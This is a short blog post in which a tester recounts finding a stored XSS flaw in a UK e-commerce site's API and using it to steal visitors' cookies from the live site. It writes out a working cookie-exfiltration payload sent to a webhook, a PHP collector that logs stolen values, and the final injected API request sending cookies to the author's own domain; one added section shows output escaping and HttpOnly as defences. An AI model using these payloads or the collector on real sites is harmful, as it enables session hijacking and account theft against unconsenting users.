How I was able to steal cookies via stored XSS on a famous e-commerce site

Bhavarth Kandoria
2 min read · Aug 11, 2018


Hi Readers,

I was very keen to find my first vulnerability, and after many attempts I succeeded. My first finding was in an e-commerce site: a stored XSS that let me steal users' cookies.

Below are the technical details of the vulnerability I found:

I was going through a very famous e-commerce website in the UK (United Kingdom) and found that it also exposed its own APIs for working with its data, so I decided to play with them. On the first attempt I submitted a simple JavaScript alert, <script>alert('Hello')</script>, in an API parameter that accepted a string value. The request was processed successfully and the server returned an id in its response; when I loaded that id in the e-commerce site, an alert box popped up.
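The alert firing means the site stored my string and later wrote it into the page as raw HTML. As an added example (not code from the post or from the site it describes), the following models that sink next to its hardened form: the same render function with output escaping, a rough check over rendered markup, and a Set-Cookie header that keeps the session cookie out of document.cookie. The element name, the escaping function and the cookie attributes are this example's own assumptions; the site's real code is unknown.

```javascript
// Added example, not code from the post or the site it describes. It models
// the bug's two sides: an API that stores a string and a page that later
// renders it. All names below are assumed for the demonstration.

// Vulnerable render: the stored string is concatenated straight into markup,
// so a value like <script>alert('Hello')</script> runs when the page loads it.
function renderUnsafe(stored) {
  return "<div class=\"item-name\">" + stored + "</div>";
}

// Escape the five characters that change meaning in HTML text or attribute
// context. Do this at output time, for the context actually being written.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened render: same markup, but the stored value is escaped on the way out.
function renderSafe(stored) {
  return "<div class=\"item-name\">" + escapeHtml(stored) + "</div>";
}

// Quick check a reviewer can run over rendered output: does a <script> tag
// survive? Full coverage needs an HTML parser; this catches the post's probe.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Even with XSS present, a cookie marked HttpOnly is not readable from
// document.cookie, so the exfiltration later in the post would not get it.
// Attribute set is an assumption for a typical session cookie.
function sessionSetCookie(name, value) {
  return name + "=" + encodeURIComponent(value) + "; Path=/; Secure; HttpOnly; SameSite=Lax";
}

const PROBE = "<script>alert('Hello')</script>"; // the probe from the post

// Side-by-side result for the probe.
function demo() {
  return {
    unsafe: renderUnsafe(PROBE),
    safe: renderSafe(PROBE),
    cookieHeader: sessionSetCookie("sid", "abc123"),
  };
}
```

Escaping must happen in the template that emits the HTML, not at the API that stores the value: the same string may later be written into JavaScript, a URL or an attribute, each of which needs its own encoding.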

After finding the vulnerable parameter I moved on to stealing user cookies. On my first attempt I used a third-party webhook service as the collector.

I tried "<script>document.write('<img src=\"https://putsreq.com/aqqiCg0uVRl3G72hAaa3?n='+document.cookie+'\"/>')</script>" in the vulnerable parameter. And what I got was bad news: the server returned the error "Parameter length is too long".

Then I realised I could use a third-party hosting service, host a small script there, and collect the cookies with a shorter URL. So, with the help of a colleague, I prepared a PHP script that reads the query parameter and appends it to log.txt. Below is the PHP script:

```php
<?php
// Collector: append whatever arrives in the query string to log.txt, one line per hit.
date_default_timezone_set("Asia/Kolkata");

// The request used later in the post sends the cookies in the "n" parameter;
// the script as originally written read "name", so both are accepted here.
$value = $_GET["n"] ?? $_GET["name"] ?? null;

if ($value !== null) {
    echo $value;
    // Timestamp plus three digits of microtime, then the captured value.
    $log = date("Y-m-d-h-i-s-") . substr((string)microtime(), 2, 3)
         . " - " . $value . PHP_EOL;
    file_put_contents(__DIR__ . '/log.txt', $log, FILE_APPEND);
} else {
    echo "Name is not set.";
}
```

I hosted this script on a free third-party hosting service, but I had not realised that the host puts its own name in the domain. My URL ended up as www.abc.thirdpartyservice.com/a.php, which was definitely not going to fit in the vulnerable API parameter. The very next day I decided to buy my own domain with a three-letter name.

So I bought my own domain and hosted the PHP script there, at www.abc.com/a.php. Below is the API request I actually used to steal cookies:

```json
{"parameter1":"1234","parameter2":"ABC1","parameter3":"<script>document.write('<img src=\"http://abc.com/a.php?n='+document.cookie+'\"/>')</script>"}
```

This request was processed successfully and the server responded with an id. When that id was looked up on the e-commerce client side, the victim's cookies were appended to the n parameter of the image request and the PHP script wrote them to the text file.

This is how I was able to steal user cookies. It was a great experience!

Thanks for reading.

Bhavarth Kandoria

An enthusiastic QA who loves cyber security, automation and finding bugs